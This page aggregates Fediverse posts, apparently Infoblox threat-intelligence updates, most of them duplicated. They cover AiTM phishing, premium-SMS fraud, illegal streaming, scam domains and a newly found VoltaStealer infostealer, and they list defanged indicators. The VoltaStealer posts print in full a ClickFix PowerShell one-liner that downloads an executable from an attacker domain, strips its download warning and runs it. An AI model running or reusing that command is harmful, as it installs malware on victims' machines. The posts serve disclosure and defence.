home.social

#infoblox — Public Fediverse posts

Live and recent posts from across the Fediverse tagged #infoblox, aggregated by home.social.

fetched live
  1. We've been tracking an AiTM phishing campaign targeting universities, enterprises, and multinational institutions — EU and UN agencies included. The actor favors likely compromised domains to host fake document portals and spoofed login pages.
    The attack chain runs through multiple phishing kits — EvilProxy, FlowerStorm, Kali365 — all built to proxy sessions in real time. The victim completes MFA. The attacker collects the session token. Authentication worked perfectly, for both parties.
    What makes this trackable: RDGA patterns, subdomain conventions, and infrastructure reuse leave a legible fingerprint in passive DNS — upstream of the login page, before any credential changes hands.
    ⛔ usersatisfactionlab[.]de
    ⛔ assessmentevaluationreport[.]com
    ⛔ duemineral[.]uk
    infoblox.com/blog/threat-intel
    #dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #phishing #aitm #rdga

  2. We've been tracking an AiTM phishing campaign targeting universities, enterprises, and multinational institutions — EU and UN agencies included. The actor favors likely compromised domains to host fake document portals and spoofed login pages.
    The attack chain runs through multiple phishing kits — EvilProxy, FlowerStorm, Kali365 — all built to proxy sessions in real time. The victim completes MFA. The attacker collects the session token. Authentication worked perfectly, for both parties.
    What makes this trackable: RDGA patterns, subdomain conventions, and infrastructure reuse leave a legible fingerprint in passive DNS — upstream of the login page, before any credential changes hands.
    ⛔ usersatisfactionlab[.]de
    ⛔ assessmentevaluationreport[.]com
    ⛔ duemineral[.]uk
    infoblox.com/blog/threat-intel
    #dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #phishing #aitm #rdga

  3. We track algorithms that generate domain names (RDGA). Now we're looking at one that generates the content. It's a strange collision of domain parking and AI generated nonsense.

    A portfolio of parked domains, each with a wildcard DNS record and a backend that serves pre-generated AI content for specific keyword combinations:

    - insurance.howtomakeasmoothie[.]com → "Why You Need Insurance When Making Smoothies"
    - insurance.backsplashdesign[.]com → "A Guide to Backsplash Insurance"
    - yacht.insurance.backpainmedication[.]com → a wellness journey involving sailing, spinal health, and coverage options

    The subdomain labels are the content brief. The domain topic is the flavour. The result is grammatically sound, mildly persuasive, and reads like it was written by someone who has heard of both topics but has never encountered either. It's AI slop at its finest. The article on smoothie insurance confidently recommends coverage "for peace of mind." The one on backsplash insurance suggests you may need a specialist endorsement. Nobody proofread these. Nobody needed to — the target audience is a crawler, not a person, and crawlers don't find non-sequiturs suspicious.

    One template, one analytics pixel (stats.computer[.]com), one CDN (images.computer[.]com) — repeated across what appears to be a large portfolio of parked-for-sale domains, each advertising itself for sale in the page header while the AI content quietly earns its keep.

    Unknown subdomains redirect to the parking marketplace. Only the pre-generated keyword combinations serve content — "insurance" being the obvious choice at the CPM rates that keyword commands.

    We're not flagging a threat. It's the technique that's worth noting as an indicator of where we could be headed. RDGAs generate domain names at scale to serve malware or evade detection. This applies the same logic to content. And the wildcard DNS backend is already exactly what you'd need for the next step: on-demand generation, where a query could produce a fresh AI-written page in real time. That capability exists now. It just isn't what's running here. Yet.

    #dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #spam #adtech #rdga

  4. We track algorithms that generate domain names (RDGA). Now we're looking at one that generates the content. It's a strange collision of domain parking and AI generated nonsense.

    A portfolio of parked domains, each with a wildcard DNS record and a backend that serves pre-generated AI content for specific keyword combinations:

    - insurance.howtomakeasmoothie[.]com → "Why You Need Insurance When Making Smoothies"
    - insurance.backsplashdesign[.]com → "A Guide to Backsplash Insurance"
    - yacht.insurance.backpainmedication[.]com → a wellness journey involving sailing, spinal health, and coverage options

    The subdomain labels are the content brief. The domain topic is the flavour. The result is grammatically sound, mildly persuasive, and reads like it was written by someone who has heard of both topics but has never encountered either. It's AI slop at its finest. The article on smoothie insurance confidently recommends coverage "for peace of mind." The one on backsplash insurance suggests you may need a specialist endorsement. Nobody proofread these. Nobody needed to — the target audience is a crawler, not a person, and crawlers don't find non-sequiturs suspicious.

    One template, one analytics pixel (stats.computer[.]com), one CDN (images.computer[.]com) — repeated across what appears to be a large portfolio of parked-for-sale domains, each advertising itself for sale in the page header while the AI content quietly earns its keep.

    Unknown subdomains redirect to the parking marketplace. Only the pre-generated keyword combinations serve content — "insurance" being the obvious choice at the CPM rates that keyword commands.

    We're not flagging a threat. It's the technique that's worth noting as an indicator of where we could be headed. RDGAs generate domain names at scale to serve malware or evade detection. This applies the same logic to content. And the wildcard DNS backend is already exactly what you'd need for the next step: on-demand generation, where a query could produce a fresh AI-written page in real time. That capability exists now. It just isn't what's running here. Yet.

    #dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #spam #adtech #rdga

  5. One tap to continue watching. Also: one tap to charge your phone bill €4.50. Click2SMS, what good are you, anyway?

    A redirect chain took us from a compromised legitimate site, through help_tds, then through a familiar Germany-based commercial TDS, to hmtraff[.]com where we finally arrived at d[.]gosmartdecision[.]com — part of an IRSF ecosystem we've been tracking since our fake CAPTCHA report.

    The landing page shows a fake video player. A large "Continue" button sits in front of it. That button is <a href="sms:81183?body=360 *CWZQ...">. One tap opens the SMS app, pre-loaded with a message to a premium-rate French shortcode. 4.50 EUR per code.

    Where the fake CAPTCHA required four separate actions to maintain a verification illusion, the video player needs one. Simpler, faster, probably more effective. The legal disclosure with the price is below the fold in 10pt text, while the large "Continue" button is in the middle of the screen.

    There's a second bonus layer: the page runs device fingerprinting and injects a credit card collection form for non-mobile visitors — cardholder name, number, CVV, expiry. Mobile French users see the Click2SMS flow. Others may get card phishing. Two modes. One domain. DNS-visible delivery chain throughout.

    hmtraff[.]com
    d[.]gosmartdecision[.]com

    Final landing page: urlscan.io/result/019f14b2-c99

    Prior report: infoblox.com/blog/threat-intel

    #dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #smishing #tds #irsf

  6. One tap to continue watching. Also: one tap to charge your phone bill €4.50. Click2SMS, what good are you, anyway?

    A redirect chain took us from a compromised legitimate site, through help_tds, then through a familiar Germany-based commercial TDS, to hmtraff[.]com where we finally arrived at d[.]gosmartdecision[.]com — part of an IRSF ecosystem we've been tracking since our fake CAPTCHA report.

    The landing page shows a fake video player. A large "Continue" button sits in front of it. That button is <a href="sms:81183?body=360 *CWZQ...">. One tap opens the SMS app, pre-loaded with a message to a premium-rate French shortcode. 4.50 EUR per code.

    Where the fake CAPTCHA required four separate actions to maintain a verification illusion, the video player needs one. Simpler, faster, probably more effective. The legal disclosure with the price is below the fold in 10pt text, while the large "Continue" button is in the middle of the screen.

    There's a second bonus layer: the page runs device fingerprinting and injects a credit card collection form for non-mobile visitors — cardholder name, number, CVV, expiry. Mobile French users see the Click2SMS flow. Others may get card phishing. Two modes. One domain. DNS-visible delivery chain throughout.

    hmtraff[.]com
    d[.]gosmartdecision[.]com

    Final landing page: urlscan.io/result/019f14b2-c99

    Prior report: infoblox.com/blog/threat-intel

    #dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #smishing #tds #irsf

  7. 👻 VoltaStealer was basically a ghost story. A slick, evasion-obsessed new infostealer hyped by its author on dark web forums, but no one reported seeing one in the wild, until now.

    While tracking a ClickFix actor, we pivoted on a known IOC into an open directory holding a very interesting payload. Artifacts and circumstantial evidence point to one suspect: VoltaStealer. We believe this is the first known sample. 🔬

    The delivery is textbook verification and fatigue bait: fraudulent sites dressed up as "security checks" and fake CAPTCHAs. Tick the "I'm not a robot" box and the page silently copies a malicious PowerShell one-liner to your clipboard. The ClickFix lure page then instructs victims to open the Windows Run dialog and enter the paste hotkey command, which fetches the malware. No exploit required, just a checkbox and trust. 🤖

    What VoltaStealer claims it can do (per its own MaaS sales pitch, surfaced via Axur's dark web monitoring):
    🔴 Runs fully in memory — custom encryption/obfuscation, minimal disk artifacts
    🔴 Heavy evasion — anti-VM/sandbox/debug, direct syscalls, runtime FUD, ~75% build uniqueness, chunked exfil to stay quiet
    🔴 Grabs everything — passwords, cookies, auth tokens, browser + desktop crypto wallets, Telegram sessions, VPN configs, and files via regex scanning
    🔴 Fast & greedy — 5–10s execution, ~95% "hit rate" claim, partial upload even if interrupted, no persistence
    🔴 Full storefront — web panel + builder, dashboards, API, team roles, clipper/loader/file-grabber modules, tiered subs

    In other words: vapor no more. 💨

    ⛔ VoltaStealer C2:
    usevolta[.]su

    ⛔ VoltaStealer Payloads (SHA256):
    2be779fc085dd89cf9e042cbcf32ee6da0cd0e3106e9dca49d52b7a839b1aa8f
    253f53b2453f8bff642421cfa5d851af8fc7100409397d80643bd792a7e38edb

    ⛔ ClickFix PowerShell command (Not VoltaStealer):
    command: "powershell -nop -w h -ep bypass -c \"$u='hXXps[:]//plonkert[.]cfd/de372ad5.exe';$f=$env:TEMP+'\\\\x.exe';$w=[Net.WebClient]::new();$w.('Down'+'loadFile')($u,$f);Unblock-File $f -EA 0;ri ($f+':Zone.Identifier') -EA 0;$env:SEE_MASK_NOZONECHECKS=1;& $f"

    ⛔ Malware payload (Not VoltaStealer) dropped via ClickFix malicious command (SHA256):
    6a6f16d7202e64fea38a757b5151a39099124a1bf55ba55e62d58f3ae102f7e8

    ⛔ ClickFix actor domains:
    comalign[.]pro
    zorivian[.]pro
    nexalora[.]pro
    kovraxis[.]com
    mevrio[.]com
    krebbo[.]world
    wobblify[.]cfd
    yovu[.]world
    glimmerix[.]pro
    launcherpatch[.]com
    grembix[.]cfd
    wumlo[.]shop
    plonkert[.]cfd
    volpo[.]cfd
    fleepax[.]cfd
    zixlo[.]cfd
    quobnar[.]world
    riotmourner[.]pro
    youfound[.]fun

    Rule of thumb: real CAPTCHAs don't ask you to open the Windows Run dialog and paste in a command. If one does, close the page. 🛑

    #dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #clickfix #infostealer #voltastealer #maas #malware #captcha #axur

  8. 👻 VoltaStealer was basically a ghost story. A slick, evasion-obsessed new infostealer hyped by its author on dark web forums, but no one reported seeing one in the wild, until now.

    While tracking a ClickFix actor, we pivoted on a known IOC into an open directory holding a very interesting payload. Artifacts and circumstantial evidence point to one suspect: VoltaStealer. We believe this is the first known sample. 🔬

    The delivery is textbook verification and fatigue bait: fraudulent sites dressed up as "security checks" and fake CAPTCHAs. Tick the "I'm not a robot" box and the page silently copies a malicious PowerShell one-liner to your clipboard. The ClickFix lure page then instructs victims to open the Windows Run dialog and enter the paste hotkey command, which fetches the malware. No exploit required, just a checkbox and trust. 🤖

    What VoltaStealer claims it can do (per its own MaaS sales pitch, surfaced via Axur's dark web monitoring):
    🔴 Runs fully in memory — custom encryption/obfuscation, minimal disk artifacts
    🔴 Heavy evasion — anti-VM/sandbox/debug, direct syscalls, runtime FUD, ~75% build uniqueness, chunked exfil to stay quiet
    🔴 Grabs everything — passwords, cookies, auth tokens, browser + desktop crypto wallets, Telegram sessions, VPN configs, and files via regex scanning
    🔴 Fast & greedy — 5–10s execution, ~95% "hit rate" claim, partial upload even if interrupted, no persistence
    🔴 Full storefront — web panel + builder, dashboards, API, team roles, clipper/loader/file-grabber modules, tiered subs

    In other words: vapor no more. 💨

    ⛔ VoltaStealer C2:
    usevolta[.]su

    ⛔ VoltaStealer Payloads (SHA256):
    2be779fc085dd89cf9e042cbcf32ee6da0cd0e3106e9dca49d52b7a839b1aa8f
    253f53b2453f8bff642421cfa5d851af8fc7100409397d80643bd792a7e38edb

    ⛔ ClickFix PowerShell command (Not VoltaStealer):
    command: "powershell -nop -w h -ep bypass -c \"$u='hXXps[:]//plonkert[.]cfd/de372ad5.exe';$f=$env:TEMP+'\\\\x.exe';$w=[Net.WebClient]::new();$w.('Down'+'loadFile')($u,$f);Unblock-File $f -EA 0;ri ($f+':Zone.Identifier') -EA 0;$env:SEE_MASK_NOZONECHECKS=1;& $f"

    ⛔ Malware payload (Not VoltaStealer) dropped via ClickFix malicious command (SHA256):
    6a6f16d7202e64fea38a757b5151a39099124a1bf55ba55e62d58f3ae102f7e8

    ⛔ ClickFix actor domains:
    comalign[.]pro
    zorivian[.]pro
    nexalora[.]pro
    kovraxis[.]com
    mevrio[.]com
    krebbo[.]world
    wobblify[.]cfd
    yovu[.]world
    glimmerix[.]pro
    launcherpatch[.]com
    grembix[.]cfd
    wumlo[.]shop
    plonkert[.]cfd
    volpo[.]cfd
    fleepax[.]cfd
    zixlo[.]cfd
    quobnar[.]world
    riotmourner[.]pro
    youfound[.]fun

    Rule of thumb: real CAPTCHAs don't ask you to open the Windows Run dialog and paste in a command. If one does, close the page. 🛑

    #dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #clickfix #infostealer #voltastealer #maas #malware #captcha #axur

  9. 🚨 📡 🇯🇵 Free TV in Japan, at a Cost: "Black-CAS" Spam Campaigns

    We've been tracking a high-volume spam campaign targeting Japanese users advertising illegal "Black-CAS" services. In Japan, satellite TV channels are accessed through Conditional Access Systems (CAS), the legitimate pay-per-channel infrastructure used by Japanese broadcasters. Black-CAS exploits that system, intercepting and cloning legitimate smartcard signals to unlock paid content without a subscription.

    Beyond the piracy angle, these devices have been documented to come preloaded with malware and residential proxy clients — buyers think they're paying for cheap TV access, but they're also handing over their network to threat actors.

    The emails rotate Japanese-language subjects like "簡単に明日からタダになる、魔法のカード" ("a magic card that makes everything free starting tomorrow") or "有料放送が、ずっとただ無料です" ("paid broadcasts, free forever"). Every email carries a set of URL shortener links (clck[.]ru, u[.]to) rather than direct destination URLs — a clear detection evasion mechanism.

    The protective shortener layer hasn't made them conservative with the number of domain registrations. Behind it, the infrastructure relies heavily on RDGAs (e.g. mchj43nmd4j53[.]xyz, 87dsq65dh3[.]xyz), while bolder actors directly use overtly themed domains: blackbcas[.]xyz, black-cas-card-tv[.]lol, black-cas-card-jp-super[.]xyz.

    At the landing pages, users can directly purchase these devices, as seen in the images below.

    This week our data puts Black-CAS alongside phishing and fake shop campaigns in the top threats targeting Japanese speakers — definitely a threat to consider.

    #dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #illegalstreaming #asia #japan #blackCAS #tv #malware #residentialproxy #spam #rdga #サイバーセキュリティ #情報セキュリティ #マルウェア #迷惑メール #ブラックCAS

  10. 🚨 📡 🇯🇵 Free TV in Japan, at a Cost: "Black-CAS" Spam Campaigns

    We've been tracking a high-volume spam campaign targeting Japanese users advertising illegal "Black-CAS" services. In Japan, satellite TV channels are accessed through Conditional Access Systems (CAS), the legitimate pay-per-channel infrastructure used by Japanese broadcasters. Black-CAS exploits that system, intercepting and cloning legitimate smartcard signals to unlock paid content without a subscription.

    Beyond the piracy angle, these devices have been documented to come preloaded with malware and residential proxy clients — buyers think they're paying for cheap TV access, but they're also handing over their network to threat actors.

    The emails rotate Japanese-language subjects like "簡単に明日からタダになる、魔法のカード" ("a magic card that makes everything free starting tomorrow") or "有料放送が、ずっとただ無料です" ("paid broadcasts, free forever"). Every email carries a set of URL shortener links (clck[.]ru, u[.]to) rather than direct destination URLs — a clear detection evasion mechanism.

    The protective shortener layer hasn't made them conservative with the number of domain registrations. Behind it, the infrastructure relies heavily on RDGAs (e.g. mchj43nmd4j53[.]xyz, 87dsq65dh3[.]xyz), while bolder actors directly use overtly themed domains: blackbcas[.]xyz, black-cas-card-tv[.]lol, black-cas-card-jp-super[.]xyz.

    At the landing pages, users can directly purchase these devices, as seen in the images below.

    This week our data puts Black-CAS alongside phishing and fake shop campaigns in the top threats targeting Japanese speakers — definitely a threat to consider.

    #dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #illegalstreaming #asia #japan #blackCAS #tv #malware #residentialproxy #spam #rdga #サイバーセキュリティ #情報セキュリティ #マルウェア #迷惑メール #ブラックCAS

  11. We've written about Keitaro-based cloaking before, and the investment scam ecosystem abusing it remains as active as ever.

    🚨 New campaigns continue to blend fake news/investment opportunity lures with global brand impersonation (SoftBank, Channel NewsAsia, CNN Brasil, etc.), paired with tightly controlled cloaking to target victims by region.

    The campaign setup is all too familiar:

    - Traffic cloaking with Keitaro: Operators use multiple Keitaro accounts to segment campaigns by geography and filter out non-targeted traffic
    - Layered social engineering: Fake media narratives build credibility before directing users to investment or crypto registration forms
    - Ad-driven distribution: Campaigns use Facebook and Twitter ads to drive victims to scam pages
    - Reusable JavaScript kits: Pages deploy Russian-language scripts with fingerprinting and strict validation checks to vet victims
    - TDS routing: TDS redircts funnel users who pass validation to fake or sketchy investment platforms or "advisor callback" pages

    The consistency of this approach shows how effective and repeatable these techniques remain for driving victim engagement at scale.

    Domain sample: justa-solvendaria-es[.]online, newstable[.]online, newsmini18[.]shop, news66[.]shop, news444[.]shop, news534[.]shop, smartrock24[.]shop, timeshe[.]shop

    #dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #scam #keitaro #investmentscam #tds #cloaking

  12. We've written about Keitaro-based cloaking before, and the investment scam ecosystem abusing it remains as active as ever.

    🚨 New campaigns continue to blend fake news/investment opportunity lures with global brand impersonation (SoftBank, Channel NewsAsia, CNN Brasil, etc.), paired with tightly controlled cloaking to target victims by region.

    The campaign setup is all too familiar:

    - Traffic cloaking with Keitaro: Operators use multiple Keitaro accounts to segment campaigns by geography and filter out non-targeted traffic
    - Layered social engineering: Fake media narratives build credibility before directing users to investment or crypto registration forms
    - Ad-driven distribution: Campaigns use Facebook and Twitter ads to drive victims to scam pages
    - Reusable JavaScript kits: Pages deploy Russian-language scripts with fingerprinting and strict validation checks to vet victims
    - TDS routing: TDS redircts funnel users who pass validation to fake or sketchy investment platforms or "advisor callback" pages

    The consistency of this approach shows how effective and repeatable these techniques remain for driving victim engagement at scale.

    Domain sample: justa-solvendaria-es[.]online, newstable[.]online, newsmini18[.]shop, news66[.]shop, news444[.]shop, news534[.]shop, smartrock24[.]shop, timeshe[.]shop

    #dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #scam #keitaro #investmentscam #tds #cloaking

  13. This is not FIFA. This is a domain hijacked by Hazy Hawk. Probably serving up residential proxyware. Definitely nothing good. check your DNS for lame nameserver delegations.

    #dns #phishing #residentialproxy #infobloxthreatIntel #infoblox #worldcup #illegalstreaming

  14. This is not FIFA. This is a domain hijacked by Hazy Hawk. Probably serving up residential proxyware. Definitely nothing good. check your DNS for lame nameserver delegations.

    #dns #phishing #residentialproxy #infobloxthreatIntel #infoblox #worldcup #illegalstreaming

  15. Having trouble finding a free 📺 streaming site for World Cup 🏟️ matches? This threat actor has you covered with thousands of websites for all 104 matches! ⚽

    We've been tracking a likely Vietnam-based actor that mass purchases expired domains (we call these dropcatch) and repurposes their existing web traffic to funnel visitors into illegal sports streaming sites, and then straight into a betting platform the same actor operates. The domain portfolio is a graveyard of real internet history: 2026worldcupnorthamerica[.]com (once cited by the Dallas Morning News and the US Men's National Team Facebook fan page), childreninachangingclimate[.]org (formerly a children's aid program), thebreastcancercharities[.]org (formerly non-profit The Breast Cancer Charities of America), and a domain officially used by major US grocery store chains involved in a large proposed merger. Collectively, this actor has spent hundreds of thousands of dollars acquiring dropcatch domains alone — a strong signal that dropcatching is a genuinely effective vehicle for cyber fraud. Behind all of it sits a staggering tech stack operated by a single actor: 5,000+ domains, illegal streaming services, CDNs, TDSs, trackers, cloakers, betting platforms, and mobile apps. That's not a side hustle, that's an enterprise. 🏗️

    While the platform largely targets Vietnamese-speaking users, as well as others in Asia and Oceania, the financial damage reaches much further. Sports authorities and broadcasters worldwide are 📉 losing revenue every time someone watches a live NBA 🏀 , MLB ⚾ :, esports 🎮 , poker 🃏 , or World Cup 🏆 match for free on one of these sites, and this actor has all of them covered.

    Some examples from the domains we've uncovered so far:

    :Dropcatch domains host or redirect to illegal streaming services

    autoredistrict[.]org
    childreninachangingclimate[.]org
    2026worldcupnorthamerica[.]com
    folsomprisonmuseum[.]org
    allaboutbasketball[.]us
    thebreastcancercharities[.]org

    :Fraudulent domains host or redirect to illegal streaming services

    90phutaa[.]cc
    90phutab[.]cc
    90phutac[.]cc
    xoilaczzzzw[.]tv
    xoilaczzzzt[.]tv
    xoilaczzzzh[.]tv

    :Lookalike domains used by the betting platforms

    fifa001[.]com
    fifa002[.]com
    fifa02[.]com
    worldcup00[.]com
    worldcup000[.]com
    worldcup02[.]com

    #dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #dropcatch #malvertising #illegalstreaming #sportsbetting #domainabuse #vietnam #worldcup #asia #fifa #streaming #betting #2026worldcup #charities #nonprofit #lookalike #xoilac #90phut

  16. Having trouble finding a free 📺 streaming site for World Cup 🏟️ matches? This threat actor has you covered with thousands of websites for all 104 matches! ⚽

    We've been tracking a likely Vietnam-based actor that mass purchases expired domains (we call these dropcatch) and repurposes their existing web traffic to funnel visitors into illegal sports streaming sites, and then straight into a betting platform the same actor operates. The domain portfolio is a graveyard of real internet history: 2026worldcupnorthamerica[.]com (once cited by the Dallas Morning News and the US Men's National Team Facebook fan page), childreninachangingclimate[.]org (formerly a children's aid program), thebreastcancercharities[.]org (formerly non-profit The Breast Cancer Charities of America), and a domain officially used by major US grocery store chains involved in a large proposed merger. Collectively, this actor has spent hundreds of thousands of dollars acquiring dropcatch domains alone — a strong signal that dropcatching is a genuinely effective vehicle for cyber fraud. Behind all of it sits a staggering tech stack operated by a single actor: 5,000+ domains, illegal streaming services, CDNs, TDSs, trackers, cloakers, betting platforms, and mobile apps. That's not a side hustle, that's an enterprise. 🏗️

    While the platform largely targets Vietnamese-speaking users, as well as others in Asia and Oceania, the financial damage reaches much further. Sports authorities and broadcasters worldwide are 📉 losing revenue every time someone watches a live NBA 🏀 , MLB ⚾ :, esports 🎮 , poker 🃏 , or World Cup 🏆 match for free on one of these sites, and this actor has all of them covered.

    Some examples from the domains we've uncovered so far:

    :Dropcatch domains host or redirect to illegal streaming services

    autoredistrict[.]org
    childreninachangingclimate[.]org
    2026worldcupnorthamerica[.]com
    folsomprisonmuseum[.]org
    allaboutbasketball[.]us
    thebreastcancercharities[.]org

    :Fraudulent domains host or redirect to illegal streaming services

    90phutaa[.]cc
    90phutab[.]cc
    90phutac[.]cc
    xoilaczzzzw[.]tv
    xoilaczzzzt[.]tv
    xoilaczzzzh[.]tv

    :Lookalike domains used by the betting platforms

    fifa001[.]com
    fifa002[.]com
    fifa02[.]com
    worldcup00[.]com
    worldcup000[.]com
    worldcup02[.]com

    #dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #dropcatch #malvertising #illegalstreaming #sportsbetting #domainabuse #vietnam #worldcup #asia #fifa #streaming #betting #2026worldcup #charities #nonprofit #lookalike #xoilac #90phut

  17. 65% - that's how many of our Threat Defense Cloud customers have been observed accessing residential proxy services. But how many of them are aware of this?
    Our latest report is a deep dive into the growing phenomenon we call 'resproxies'. Resproxies, which are often embedded in Android IoT devices, or baked into "free" applications, may be running in your environment, granting access to your own IP space, or even worse, like in the case of Kimwolf, granting access to your internal network. Turns out "bring your own device" sometimes means "bring your own residential proxy." 😬

    Our new research (with @synthient who covered what happens on the other end):
    🔗 infoblox.com/blog/threat-intel
    #dns #threatintel #threatintelligence #cybercrime #cyber #cybersecurity #infosec #infoblox #infobloxthreatintel #residentialproxy #resproxy

  18. 65% - that's how many of our Threat Defense Cloud customers have been observed accessing residential proxy services. But how many of them are aware of this?
    Our latest report is a deep dive into the growing phenomenon we call 'resproxies'. Resproxies, which are often embedded in Android IoT devices, or baked into "free" applications, may be running in your environment, granting access to your own IP space, or even worse, like in the case of Kimwolf, granting access to your internal network. Turns out "bring your own device" sometimes means "bring your own residential proxy." 😬

    Our new research (with @synthient who covered what happens on the other end):
    🔗 infoblox.com/blog/threat-intel
    #dns #threatintel #threatintelligence #cybercrime #cyber #cybersecurity #infosec #infoblox #infobloxthreatintel #residentialproxy #resproxy

  19. Threat actors are leveraging shared infrastructure together with subdomain abuse to control and serve hundreds of malicious websites with minimal management.

    This week we were investigating a cluster of crypto brand lookalike domains.Through subdomain abuse – often powered by wildcard DNS configurations – just 34 registered domains expand to over 500 scam sites.

    Investigating website content across that cluster allowed us to find several additional clusters running the same playbook. Thousands of domains on them.

    This initial cluster impersonated dozens of brands — Binance, Coinbase, Kraken, KuCoin, Bybit, Bitmart. Several of these sites push fake app downloads, making malware delivery and crypto wallet theft a likely component of the broader operation.

    A sample of the domains associated:

    cryptocoinsx[.]cfd
    bmarkit[.]com
    zznyusbsgo.bitmart[.]pw
    4pzyy6n7log71mm0.bitmarts[.]cc
    5etxkk2aeh8jfgl0.bitstamptc[.]com

    #dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #Phishing #Scams #malware #crypto #lookalikes #subdomains #iocs

  20. Threat actors are leveraging shared infrastructure together with subdomain abuse to control and serve hundreds of malicious websites with minimal management.

    This week we were investigating a cluster of crypto brand lookalike domains.Through subdomain abuse – often powered by wildcard DNS configurations – just 34 registered domains expand to over 500 scam sites.

    Investigating website content across that cluster allowed us to find several additional clusters running the same playbook. Thousands of domains on them.

    This initial cluster impersonated dozens of brands — Binance, Coinbase, Kraken, KuCoin, Bybit, Bitmart. Several of these sites push fake app downloads, making malware delivery and crypto wallet theft a likely component of the broader operation.

    A sample of the domains associated:

    cryptocoinsx[.]cfd
    bmarkit[.]com
    zznyusbsgo.bitmart[.]pw
    4pzyy6n7log71mm0.bitmarts[.]cc
    5etxkk2aeh8jfgl0.bitstamptc[.]com

    #dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #Phishing #Scams #malware #crypto #lookalikes #subdomains #iocs

  21. Boss too tough? Salary too low? If you're after a new gig, look no further 💼

    We’re tracking a recruitment‑themed phishing campaign that opens with hope of a career upgrade and ends in stolen credentials.

    Victims are targeted through emails spammed out by “recruiters” impersonating real people — LinkedIn profiles copied in full, including photos and current recruiter identities. The lure leans on exciting big‑name brands including FIFA, UEFA, Nike and Spotify to anchor legitimacy before prompting victims to schedule an interview using a bogus Calendly page 👔 💫

    About time they noticed your stellar performance, right? But this interview comes with a catch 🎣 To seal the deal, you'll need to log in with your company email.

    The mechanics:
    • Initial outreach primes the role and rapport with some feel-good shmoozing
    • Link to schedule your interview lands on a cloned Calendly recruitment portal
    • Follow‑on contact nudges the victim through staged redirects
    • Your credentials submit their 30-day notice ⚠️

    Behind the scenes:
    • Convincing lookalike domains generated at scale (RDGAs), rotated aggressively
    • Layered redirect chains to blur origin and intent
    • Compromised or fraudulently obtained Salesforce Marketing Cloud used for delivery, helping mails sail past controls
    • Lure pages clone the Pinpoint ATS — attribution supported by Pinpoint’s own Cloudinary account ID (pinpointhq) embedded in assets
    • Domain validation logic limits logins to business email providers, excluding free webmail services

    Sad to say, the only thing getting “shortlisted” here is your inbox for another round of credential theft.

    IOCs
    • brand-jobs[.]com
    • brand-careers[.]com
    • hr-brand[.]com
    • brand-talenthub[.]com

    These campaigns remain active, with the actor spinning up new lures impersonating other major brands. We regret to inform you, it seems they'll be moving forward with other candidates 😩

    Better luck next time.

    #dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #phishing

  22. Boss too tough? Salary too low? If you're after a new gig, look no further 💼

    We’re tracking a recruitment‑themed phishing campaign that opens with hope of a career upgrade and ends in stolen credentials.

    Victims are targeted through emails spammed out by “recruiters” impersonating real people — LinkedIn profiles copied in full, including photos and current recruiter identities. The lure leans on exciting big‑name brands including FIFA, UEFA, Nike and Spotify to anchor legitimacy before prompting victims to schedule an interview using a bogus Calendly page 👔 💫

    About time they noticed your stellar performance, right? But this interview comes with a catch 🎣 To seal the deal, you'll need to log in with your company email.

    The mechanics:
    • Initial outreach primes the role and rapport with some feel-good shmoozing
    • Link to schedule your interview lands on a cloned Calendly recruitment portal
    • Follow‑on contact nudges the victim through staged redirects
    • Your credentials submit their 30-day notice ⚠️

    Behind the scenes:
    • Convincing lookalike domains generated at scale (RDGAs), rotated aggressively
    • Layered redirect chains to blur origin and intent
    • Compromised or fraudulently obtained Salesforce Marketing Cloud used for delivery, helping mails sail past controls
    • Lure pages clone the Pinpoint ATS — attribution supported by Pinpoint’s own Cloudinary account ID (pinpointhq) embedded in assets
    • Domain validation logic limits logins to business email providers, excluding free webmail services

    Sad to say, the only thing getting “shortlisted” here is your inbox for another round of credential theft.

    IOCs
    • brand-jobs[.]com
    • brand-careers[.]com
    • hr-brand[.]com
    • brand-talenthub[.]com

    These campaigns remain active, with the actor spinning up new lures impersonating other major brands. We regret to inform you, it seems they'll be moving forward with other candidates 😩

    Better luck next time.

    #dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #phishing

  23. ⚽ Looking for FIFA World Cup tickets without the queue?

    We're continuously tracking a surge in convincing FIFA lookalike sites we first posted on last month, but this isn't your typical phishing game — it's full‑blown counterfeit ticketing, run like a high‑volume e‑commerce operation.

    Premier League theatrics. Sunday league legitimacy 🎭

    The flow:
    • Land on a polished FIFA clone
    • Auto‑localized content (language, region, pricing)
    • "Checkout" pushed through rotating payment domains

    Behind the curtain:
    • ⚡ High domain churn — fresh registrations daily
    • 🔄 Payment infrastructure swapped in/out to dodge disruption
    • 🪞 Near-perfect mirroring of official FIFA content

    There are indicators pointing to Chinese‑origin operators (hosting patterns, code artifacts), but targeting is global—and scalable.

    The interesting bit? This isn't about stealing creds.

    It's about conversion at scale. Auto-localisation + disposable infrastructure = throughput over stealth.

    No ticket. No refund. Reliable revenue stream.

    While this actor keeps kickin' and churning out new domains, we'll be here tracking the infrastructure... and yes it's because we can't afford a real ticket to the game.

    #dns #threatintel #cybersecurity #infosec #scam #phishing #infoblox #infobloxthreatintel #WorldCup2026 #FIFA

